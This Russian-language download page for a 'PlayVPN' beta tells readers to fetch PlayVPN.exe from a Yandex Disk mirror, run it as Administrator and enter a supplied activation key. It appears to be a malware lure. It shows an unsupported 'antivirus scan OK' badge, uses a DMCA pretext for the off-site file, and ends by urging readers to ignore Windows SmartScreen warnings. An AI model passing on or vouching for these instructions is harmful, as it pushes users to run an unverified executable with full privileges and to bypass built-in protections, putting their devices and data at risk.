*******************************************************************************
* *
* ██████╗ ██╗      █████╗ ██╗   ██╗██╗   ██╗██████╗ ███╗   ██╗             *
* ██╔══██╗██║     ██╔══██╗╚██╗ ██╔╝██║   ██║██╔══██╗████╗  ██║             *
* ██████╔╝██║     ███████║ ╚████╔╝ ██║   ██║██████╔╝██╔██╗ ██║             *
* ██╔═══╝ ██║     ██╔══██║  ╚██╔╝  ╚██╗ ██╔╝██╔═══╝ ██║╚██╗██║             *
* ██║     ███████╗██║  ██║   ██║    ╚████╔╝ ██║     ██║ ╚████║             *
* ╚═╝     ╚══════╝╚═╝  ╚═╝   ╚═╝     ╚═══╝  ╚═╝     ╚═╝  ╚═══╝             *
* *
* SECURE CONNECTION . BETA v2.6.0                        *
*******************************************************************************

[ СТАТУС: ПРОВЕРЕНО ANTIVIRUS SCAN - OK ]
[ ВЕРСИЯ: 2.6.0.12 (BUILD 2026)         ]

-------------------------------------------------------------------------------
ИНСТРУКЦИЯ ПО ЗАГРУЗКЕ И УСТАНОВКЕ:
-------------------------------------------------------------------------------

По техническим причинам и в целях безопасности (защита от DMCA), основной 
исполняемый файл перенесен на зеркало в облачное хранилище.

1. СКАЧАТЬ PlayVPN.exe ПО ССЫЛКЕ:
   https://disk.yandex.kz/d/ruwq4uLsI5tkoQ

2. После загрузки запустите установщик от имени Администратора.
3. При появлении окна активации используйте ваш уникальный ключ Beta-теста.

-------------------------------------------------------------------------------
ВАШ КЛЮЧ АКТИВАЦИИ:
-------------------------------------------------------------------------------

      KEY: key_p14yvpn

-------------------------------------------------------------------------------
ВНИМАНИЕ:
Этот ключ привязан к вашей сессии. Если установщик выдает ошибку "Key Expired", 
повторите попытку ввода через 60 секунд или перезагрузите приложение.
-------------------------------------------------------------------------------

Support: support@playvpn.v6.rocks
Official Website: https://home.playvpn.v6.rocks

*******************************************************************************
(c) 2026 PlayVPN Digital Solutions. All Rights Reserved.
*******************************************************************************

  (ЕСЛИ УВИДИТЕ WINDOWS SMARTSCREEN НЕ БОЙТЕСЬ НАШЕ ПРИЛОЖЕНИЕ ПРОСТО НЕ ЗАРЕГИСТРИВАНО В WINDOWS, НИЧЕГО ПЛОХОГО С ВАШИМ УСТРОЙСТВОМ НЕ БУДЕТ!!!)
